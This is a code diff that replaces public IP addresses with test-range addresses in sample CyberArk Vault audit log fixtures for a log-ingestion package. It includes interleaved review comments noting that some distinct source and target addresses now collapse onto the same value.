@@ -1,2 +1,2 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log index 3f7fa511cc8..a9d4c8d1111 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log 
@@ -1,2 +1,2 @@ -<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} +<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} <5>1 2021-03-11T18:01:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:01:14\n 2021-03-11T18:01:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 187\n Add Folder\n Info\n PVWAAppUser\n Add Folder\n \n \n PSMUnmanagedSessionAccounts\n Root\\2\\\n 10.0.1.20\n \n \n \n \n \n Add Folder\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:01:14","IsoTimestamp":"2021-03-11T18:01:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"PVWAAppUser","Action":"Add 
Folder","SourceUser":"","TargetUser":"","Safe":"PSMUnmanagedSessionAccounts","File":"Root\\2\\","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log index 88926eb1571..2794595cff7 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log 
@@ -1,9 +1,9 @@ <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T08:31:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:31:50","IsoTimestamp":"2021-03-10T08:31:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"PasswordManager","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T22:37:00Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:37:00","IsoTimestamp":"2021-03-10T22:37:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full 
Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.10","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway 
Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 35.192.121.42\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 81.32.170.205\n \n \n \n \n \n Full Gateway Connection\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway 
Connection","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n 
Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 67.43.156.14\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 67.43.156.13\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log index f3949f536de..fe6a126c6cb 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log 
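Review bot: The substitution folds two previously distinct source stations onto a single address: the 2021-03-09T08:32:51Z event (old `"Station":"81.32.170.205"`) and the 2021-03-09T10:14:58Z event (old `"Station":"37.223.7.45"`) both become `"Station":"67.43.156.13"` on the new side, so this fixture no longer shows PVWAGWUser gateway connections arriving from two different public sources. If the expected-output file or any test of distinct `source.ip` values depends on that, consider giving the 10:14:58Z event another unused address from the same block, e.g. `"Station":"67.43.156.16"`, provided that address is also within the supported test subset. The mapping used for the remaining events in this hunk (81.32.170.205 to 67.43.156.13, 35.192.121.42 to 67.43.156.14, 34.71.250.247 to 67.43.156.15) is applied consistently in both the `raw` text and the structured `Station`/`GatewayStation` fields, which looks right.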
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log 
@@ -1,2 +1,2 @@ Apr 07 09:51:42 VAULT {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\n 10.2.0.4\n \n \n \n ImmediateTask\n address=radiussrv.cyberark.local;username=test12;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","IsoTimestamp":"2021-03-16T15:01:00Z","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12","Station":"10.2.0.4","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=radiussrv.cyberark.local;username=test12;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"test12"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastSuccessVerification","Value":"1604943844"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"}]}}}} -<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=34.123.103.115;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=67.43.156.15;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log index 51629665b2b..b4953ee2439 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log 
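Review bot: The Mar 15 record substitutes 67.43.156.15 for the managed target 34.123.103.115 in `File`, `ExtraDetails` and `CAProperties.Address`, but the same test address already replaces the administrator's Station 34.71.250.247 in the 23_action_on_closed_safe and 265_add_group_member hunks (and appears as `GatewayStation` in the 19 record above), so two distinct real hosts — an operator/gateway station and a managed Linux account's address — now collapse onto one IP. That weakens the fixture: a pipeline that mixed up source-style fields (`Station`) with target-style fields (`Address`) would still emit the expected value, and host-centric views of the sample data would show the operator station as a managed account. If the intent was a one-to-one substitution, give the target its own address from the same test range, e.g. `Root\Operating System-UnixSSH-67.43.156.16-testark`, `address=67.43.156.16;username=testark;` and `{"Name":"Address","Value":"67.43.156.16"}`, then regenerate the corresponding expected pipeline output. The Apr 07 record at the top of the hunk is unchanged context and carries only an RFC 1918 station address, so it needs no change.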
@@ -1,3 +1,3 @@ -<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} <7>1 2021-03-14T12:07:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:27\n 2021-03-14T12:07:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n PasswordManager\n Action On Closed Safe\n \n \n AccountsFeedADAccounts\n \n 10.0.1.20\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:27","IsoTimestamp":"2021-03-14T12:07:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"PasswordManager","Action":"Action On Closed 
Safe","SourceUser":"","TargetUser":"","Safe":"AccountsFeedADAccounts","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} -<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 34.71.250.247\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 67.43.156.15\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} 
